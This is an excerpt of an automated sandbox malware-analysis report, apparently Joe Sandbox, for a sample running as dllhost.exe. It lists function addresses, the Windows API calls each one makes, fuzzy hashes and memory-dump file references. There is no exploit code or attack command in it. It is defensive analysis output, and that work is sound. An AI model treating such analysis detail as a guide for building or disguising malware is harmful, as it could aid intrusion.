                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info
                                                                                  • String ID: $
                                                                                  • API String ID: 1807457897-3032137957
                                                                                  • Opcode ID: d5f15c20618a8da3d157eca65b183158ce57c22163765777d6246d6c24c000bc
                                                                                  • Instruction ID: 53da26199c654d2664154929d565a6d6703e7d1cf3da02fb996c2f8f2c7b9b56
                                                                                  • Opcode Fuzzy Hash: d5f15c20618a8da3d157eca65b183158ce57c22163765777d6246d6c24c000bc
                                                                                  • Instruction Fuzzy Hash: FB4178B10001981FEB118754DD59FF77FA9AB42704F1800FAD346E71E3D2784A048BAB
                                                                                  Function 0040155D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00405455,?), ref: 0040157B
                                                                                  • GetStringTypeW.KERNEL32(?,?,00000000,UT@,?,?,?,?,?,?,00405455,?), ref: 0040158D
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiStringTypeWide
                                                                                  • String ID: UT@
                                                                                  • API String ID: 3139900361-1027468425
                                                                                  • Opcode ID: d8b5a6315cc255685bc58f211870a36f37305f0522f1b0d839e36d6274f612bc
                                                                                  • Instruction ID: ae2c8b6bed3a1a63e45d0801f90e185e9f0518096c5375cea126aa6df245d2ca
                                                                                  • Opcode Fuzzy Hash: d8b5a6315cc255685bc58f211870a36f37305f0522f1b0d839e36d6274f612bc
                                                                                  • Instruction Fuzzy Hash: C3F0DA72501255AFCF218F80DD459EEBF72FB48360F144126FA16751A0D33559609A95
                                                                                  Function 00403064 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • HeapReAlloc.KERNEL32(00000000,?,00000000,00000000,00402D2D,00000000,00000000,00000000,00401D46,00000000,00000000,?,00000000,00000000,00000000), ref: 0040308C
                                                                                  • HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00402D2D,00000000,00000000,00000000,00401D46,00000000,00000000,?,00000000,00000000,00000000), ref: 004030C0
                                                                                  • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004030DA
                                                                                  • HeapFree.KERNEL32(00000000,?), ref: 004030F1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocHeap$FreeVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 3499195154-0
                                                                                  • Opcode ID: a33ebd811453650a451694e4321f5bb8f2711becefd144dde414fb059f67f41e
                                                                                  • Instruction ID: 7a633f342ebd28cbc89cba67429d3dad0771407b95541da556538c88800531f2
                                                                                  • Opcode Fuzzy Hash: a33ebd811453650a451694e4321f5bb8f2711becefd144dde414fb059f67f41e
                                                                                  • Instruction Fuzzy Hash: 1C116D70200381AFD7308F19EC45A627BB5FB867127104939F152D62B1E7B09E46DF49
                                                                                  Function 0040400C Relevance: 5.0, APIs: 4, Instructions: 12COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404019
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404021
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404029
                                                                                  • InitializeCriticalSection.KERNEL32(?,00403FBE,?,00401070), ref: 00404031
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.2375951754.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.2375937673.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.0000000000409000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2375966735.000000000045C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376004528.000000000045D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376017995.000000000045F000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376031374.0000000000461000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.2376044732.0000000000464000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_400000_dllhost.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalInitializeSection
                                                                                  • String ID:
                                                                                  • API String ID: 32694325-0
                                                                                  • Opcode ID: 5409a8d8e14127a5ce235ccad8aaf5674b6d6844133d0f33aee3699391df0c2a
                                                                                  • Instruction ID: aa4c73ddd6739a18e28f690a0a169ce4de3aa9dd01ea8e4f37dabd6de307042e
                                                                                  • Opcode Fuzzy Hash: 5409a8d8e14127a5ce235ccad8aaf5674b6d6844133d0f33aee3699391df0c2a
                                                                                  • Instruction Fuzzy Hash: 73C00231D011349FDF323B65FE058453F26EF042A23010077A9085543686215C10DFCD